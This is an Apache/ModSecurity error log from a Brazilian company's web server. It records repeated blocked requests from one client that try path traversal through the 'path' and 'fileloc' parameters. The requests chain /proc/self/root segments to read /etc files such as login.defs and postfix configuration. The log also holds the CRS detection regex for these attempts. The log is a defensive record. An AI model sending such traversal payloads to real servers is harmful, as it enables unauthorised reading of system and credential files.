[Wed Mar 18 09:24:11.732811 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:39966] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZa_u8EFLIOrSqIpv2qgAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:24:17.479845 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.243.128:56918] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZcdY0UrI5A3LftIyVvwAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:24:21.061319 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:56934] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZdSmAPhZkrhU8w4le9wAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:24:31.152409 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.243.128:41176] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZf-w_le52K8_3pV3RJgAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:24:34.748098 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:44184] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZgQkwaGbbGflqUZACGwAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:24:36.156421 2026] [:error] [pid 29882:tid 140411716749056] [client 74.7.243.128:44198] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZhEzinOy1jxa1j4cGQAAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:07.852446 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.128:44210] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/printcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZotY0UrI5A3LftIyV7wAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:09.410322 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:44602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZpeyqAr6etmhZHNqxGQAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:10.758489 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.243.128:48010] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZpuyqAr6etmhZHNqxHgAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:12.041870 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.243.128:48026] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZqOyqAr6etmhZHNqxIwAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:12.042608 2026] [mime_magic:error] [pid 31803:tid 140411599251200] (70014)End of file found: [client 74.7.243.128:48026] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:12.551033 2026] [:error] [pid 29882:tid 140411624429312] [client 74.7.243.128:48028] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZqEzinOy1jxa1j4cGVwAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:13.876612 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:48044] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZqda6ubjKNq_cu4aLFAAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:15.206990 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:48054] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZq8df6f5d65gmYZTGjQAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:16.540972 2026] [:error] [pid 11816:tid 140411741927168] [client 74.7.243.128:48064] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZrOw_le52K8_3pV3RNAAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:17.869869 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:48080] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZrQkwaGbbGflqUZACKgAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:20.221914 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.243.128:48092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZsOw_le52K8_3pV3RNgAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:21.572518 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.243.128:54110] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZsdY0UrI5A3LftIyWAgAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:22.859099 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.243.128:54122] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZstY0UrI5A3LftIyWBAAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:24.223054 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.243.128:54138] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZtMdf6f5d65gmYZTGjgAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:26.183722 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.243.128:54144] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZtfu8EFLIOrSqIpv2yAAAAkM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 09:25:29.012492 2026] [:error] [pid 15051:tid 140411641214720] [client 74.7.243.128:54146] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqZtymAPhZkrhU8w4lfDwAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
